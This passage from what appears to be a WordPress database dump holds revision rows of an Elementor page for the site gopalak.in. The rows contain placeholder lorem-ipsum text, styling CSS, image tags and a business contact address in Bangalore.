.elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:41','2022-09-30 06:56:41','',1373,'https://gopalak.in/?p=1506',0,'revision','',0),(1508,1,'2022-09-30 13:20:26','2022-09-30 07:50:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 13:20:26','2022-09-30 07:50:26','',1373,'https://gopalak.in/?p=1508',0,'revision','',0),(1509,1,'2022-09-30 13:20:26','2022-09-30 07:50:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			